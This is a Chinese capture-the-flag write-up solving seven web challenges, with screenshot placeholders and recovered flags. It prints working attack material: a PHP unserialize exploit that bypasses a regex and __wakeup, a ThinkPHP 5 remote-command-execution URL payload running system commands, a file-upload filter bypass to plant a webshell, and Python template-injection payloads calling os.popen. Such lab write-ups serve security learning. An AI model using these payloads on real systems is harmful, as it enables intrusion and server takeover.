Web·进阶区

1、baby_web

image-20201202094708364

根据题目描述，访问index.php

但是会直接跳转到1.php页面

打开F12工具栏

image-20201202100144042

发现有数据包，点击查看

image-20201202100212068

得到flag

flag{very_baby_web}

2、Training-WWW-Robots

image-20201202100318589

打开环境是一个介绍页面

image-20201202100444483

根据提示查看robots.txt

image-20201202100518144

发现有一个fl0g.php的页面

访问一下

image-20201202100607553

得到flag

cyberpeace{8328b5996bbec11e3b738531010b1577}

3、Web_php_unserialize

image-20201202100657107

打开页面，发现一段源码

image-20201202100810919

需要以下三个步骤

1、$file改成fl4g.php；

2、绕过：preg_match('/[oc]:\d+:/i', $var)

3、跳过__wakeup()。

<?php
class Demo {
    private $file = 'fl4g.php';//$file改成fl4g.php
}

$a= serialize(new demo);
$a= str_replace('O:4', 'O:+4',$a);//绕过preg_match
$a= str_replace(':1:', ':2:',$a);//绕过wakeup
echo base64_encode($a);
?>

生成Exp

image-20201202104917993

TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

将其作为var值用get方法提交

image-20201202105011931

得到flag

ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}

4、php_rce

image-20201202105237550

环境为ThinkPHP V5

image-20201202114841054

网上查了一下，发现该版本存在rce远程执行漏洞，使用如下payload查看当前目录

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

image-20201202115316350

返回上一级目录

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls ../

image-20201202115412490

继续返回上一级目录

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls ../../

image-20201202115454490

继续

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls% ../../../

image-20201202115529644

发现flag，使用cat命令

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20../../../flag

image-20201202115624080

得到flag

flag{thinkphp5_rce}

5、upload1

image-20201202115923368

看题目应该是文件上传的题

环境打开后如下

image-20201202120756844

准备上传一句话

image-20201202120952427

发现只允许上传图片

修改文件后缀为jpg

image-20201202121115688

开启burp，准备抓包，先修改代理

image-20201202121208159

开启截断

image-20201202121229281

准备上传

image-20201202121257204

在请求包中修改文件后缀为php

image-20201202121352284

放包，上传成功

image-20201202121419359

使用蚁剑连接

image-20201202121531235

测试一下连接情况

image-20201202121552716

成功，完成添加，进入网站目录

image-20201202121630003

在上级目录html中发现flag.php

image-20201202121716973

得到flag

image-20201202121731254

cyberpeace{2a5d620ae581a1f0831022cf5b40b0ea}

6、Web_php_include

image-20201202123625584

打开环境是一段源码

image-20201202123700188

传入了一个hello参数，尝试赋一个值

image-20201202123903006

发现这个hello是有回显的，所以说不定这里可以命令执行然后回显到浏览器

尝试构造payload，首先要构造hello这个参数我们必须先让我们传进的page参数为真才行

image-20201202124110669

发现疑似flag文件，使用show_source()函数查看该文件

image-20201202124237632

得到flag

ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

7、Web_python_template_injection

image-20201202124612687

环境提示python模板注入

image-20201202125051402

尝试看看内部{}中的代码是否被执行

image-20201202125410514

确实被执行了

调用os模块的popen执行ls打印所有文件

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("ls").read()}}

image-20201202125231518

cat fl4g

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("cat fl4g").read()}}

image-20201202131934513

得到flag

ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}